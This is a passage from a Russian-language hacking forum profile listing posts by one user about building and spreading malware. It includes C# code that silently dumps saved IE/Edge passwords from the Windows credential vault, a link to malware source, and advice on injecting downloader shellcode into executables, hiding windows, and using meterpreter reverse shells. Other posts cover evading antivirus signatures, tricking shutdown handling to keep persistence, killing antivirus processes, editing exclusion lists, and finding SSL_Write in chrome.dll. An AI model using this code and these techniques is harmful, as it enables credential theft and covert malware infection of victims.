Перейти к содержанию

NaVi_Slon

Пользователь
  • Публикаций

    15
  • Зарегистрирован

  • Посещение

Репутация

57 Excellent

Информация о NaVi_Slon

  • Звание
    Rank №2
  1. но у тебя же в описании пункт: "Качественный выход из LOW уровня интеграции" если качественный, то это low->high\system без какого-либо взаимодействия с юзером, или я что-то не догоняю?
  2. Приветствую, пытаюсь найти SSL_Write функцию в chrome.dll но что-то безуспешно. как ищу: Смотрю на эту функцию h__ps://boringssl.googlesource.com/boringssl/+/chromium-stable/ssl/ssl_lib.cc. Тут вижу вот это _ttp://prntscr.com/ir4kqj вызов некоторой функции и передача ей задефайненого аргумента, тогда по идее где-то около вызова этой функции должно быть что-то вроде push 0xCF //207 push XX //first arg call sub_XXX Ищу команду push 0xCF(68 cf 00 00 00). IDA находит порядка 10 вхождений данной инструкции в chrome.dll, далее я декомпилирую функцию в которой вхождение и смотрю на схожесть с оригинальной функцией _ttp://prntscr.com/ir4osi Но что-то ничего похожего я не могу найти, подскажите, что я не так делаю, ну или как надо делать
  3. ВНЦ

    Перпендикулярную --------- Папки в профайле можно проигнорировать все, а вот файлы что лежат на первом уровне профайла надо скопировать все
  4. еще такой момент, в вин 8-10 пароли из ie\edge надо из vault вытаскивать а не как там через реестр. Делать вот так: ....... Process p = new Process(); p.StartInfo.FileName = "powershell"; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.Arguments = "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,Cont entType=WindowsRuntime]; (new-object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ }"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.Start(); list.AddRange(ParseOutput(p.StandardOutput.ReadToEnd())); return list; } private static List ParseOutput(string output) { List parsed = new List(); List delimeted = output.Split(' ').ToList(); delimeted.RemoveAll(filter); int login = 8; int url = 9; int password = 10; while (password 2 <= delimeted.Count ) { try { RecoveredAccount rc = new RecoveredAccount(); rc.Application = "IE\\EDGE"; if (delimeted[password].Split('-').Length > 3) { login = 2; password = 2; url = 2; continue; } rc.Password = delimeted[password]; rc.URL = delimeted[url]; string[] tmp = delimeted[login].Split('\n'); rc.Username = tmp.Length > 1 ? tmp[1] : tmp[0]; parsed.Add(rc); } catch { } login = 3; password = 3; url = 3; } return parsed; } private static bool filter(string s) { return (String.IsNullOrEmpty(s) || s.Contains(",")); }
  5. https://github.com/SyFi/malware-tesla/tree/master/Source
  6. смотря какой язык. с: ShellExecute с флагом SW_HIDE c#: process.StartUpArgs.WindowStyle = WindowStyle.Hidden / Process.CreateNoWindow = true
  7. Насколько я знаю, для изменения execution policy нужны админ права, что не очень хорошо
  8. Дело в том, что для этого требуется знать конфигурацию системы. Разные системы = разные точки входа и способы. Можно как-то описать более точно задачу? Или у тебя нет цели как таковой и ты просто хочешь обучится? Платформа: всё семейство windows. Задача: внедрить shellcode в ехе. Задача шеллкода: подтянуть и запустить бот на машине. С чем разобрался на данный момент. Использовал shellter (спасибо одному форумчанину). Внедрил обычный shellcode winexec, чтобы скачать и запустить файл ехе. Это удалось сделать, но в любом случае моргает само окно powershella (т.е. палевно). Когда разбирался с этим, то узнал про PS1 и meterpreter. Сегодня сяду и буду писать PS1 скрипт. Надеюсь этим избежать моргание окна powershell'a. Если не получится, то придётся использовать meterpreter reverse tcp и выстраивать всю систему вокруг него. Просто мне нужен человек с которым можно было бы поговорить и у которого был опыт работы со всем этим. Написать я смогу, но здесь как везде: куча подводных камней, детекты АВ и прочее. Хотелось бы сделать всё за 3-4 дня, а не за пару недель (до адекватного вида). P.S.: боты (smoke bot с модулями ещё один есть VNC) уже есть, путь как лить траффик (чистый, не через биржи) тоже есть. Всё есть, ехе - нет :D :D :D P.S.S.: можем договориться о сотрудничестве, потому что всегда нужен такой человек у которого есть опыт и знания. ps1 не самый лучший вариант, так как powershell может сказать что-то вроде "на этом пк запрещено выполнение сценариев"(точно не помню, но типо такого косяка что-то точно есть). А вообще powershell очень хорошо может работать с c# т.е cs файлы главное писать код который совместим как с 3.5 так и с 4 .NET(если не требуется поддержка старше вин7) args: "Add-Type -Path "Path\to\*.cs"; [MainClass]::AnyPublicStaticMethod()" -------- и да, "за 3-4 дня", видимо ты и понятия не имеешь сколько граблей лежит на этом нелегком пути :D Ну, в любом случае, удачи))
  9. Защита от антивирусов

    имеешь ввиду что-то типо этого? https://dedik.cc/index.php?showtopic=141078
  10. Защита от антивирусов

    Вообще, еще очень важный момент, нужно различать типы статик детектов, а именно GEN и HEUR, обычно пишется в названии детекта. GEN - тупо сигнатура, которая чистится легко. HEUR - детект эвристики и просто так заменой пары стрингов наврятли избавишься, например, я когда-то ловил HEUR детект от кисы, менял как мог, не отваливался детект, а потом просто взял, и кусок кода сбросил в catch, а в try тупо throw new Exception() и детект отвалился А вообще, то что ты хочешь сделать, называется морфер сорсов, найти сложно, стоит дорого, да и под шарп к тому же, так что надо самому писать
  11. Защита от антивирусов

    Крипт - да, но во-первых хочется иногда обходиться без крипта, т.к. это не всегда удобно, и никогда в 0 не криптуется(мб это из-за крипта, или из-за особенностей сборки), а во-вторых, хоть какие-то аверы хотелось бы обходить без крипта. Что есть чистка статики? С точки зрения программирования желательно, а не вирусологии условно у тебя в скомпиленом билде, т е в ехе файле есть некая последовательность байт, допустим 4С АF FC B1 BF A7, для ав это сигнатура, он чекает твой билд, если видит там такую последовательность, то ты ловишь детект, твоя задача состоит в том что бы изменить данную последовательность, ну и плюс надо помнить что ав может иметь несколько таких сигнатур для одного файла
  12. хорошо сказано, ав точно сердиться будет, наверное даже колени сразу прострелит :D
  13. Не факт, в соседней ветке продается GodzillaLoader(точно не помню как называется), он траф пускает через родную приложуху винды, там вроде даже чутка описания есть что и как у него по конекту сделано, и имеет 3 детекта в рантайме без серта, ну по крайней мере в топе видел что писали про 3 в рантайме. Ну и вдобавок, частенько любят инжектиться в легитимный процесс и стучать оттуда, как смок, но это уже совсем другая история
  14. 5 пацанов в центре не снимаются без серта(кроме скорее всего emisoft), ребята просто палят конект в инет без подписи. Касательно 360 и панды, можно сделать хитрее: дернуть апи "ShutdownBlockReasonCreate" (тот прикол который просит тебя нажать кнопку "принудительное завершение работы"), а самому, в случае получения "wm_queryendsession", прыгать в RunOnce и сразу дергать после этого "ShutdownBlockReasonDestroy" что бы пк ушел в шутдаун, тем самым не показываю юзеру детект и не давая принять решение, ввиду чего запись в реестре останется. Ну тут конечно риск, что если дернуть шнур из розетки, то теряем машину 100%, так что смотри сам
  15. Пароль на АВ

    Process Hacker с правами админа может убивать процессы АВ. Касательно нода и аваста, то они хранят исключения в: Avast "C:\ProgramData\AVAST Software\Avast\exclusions.ini" Eset "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000600\settings\ScannerExcludes" Удачи)
×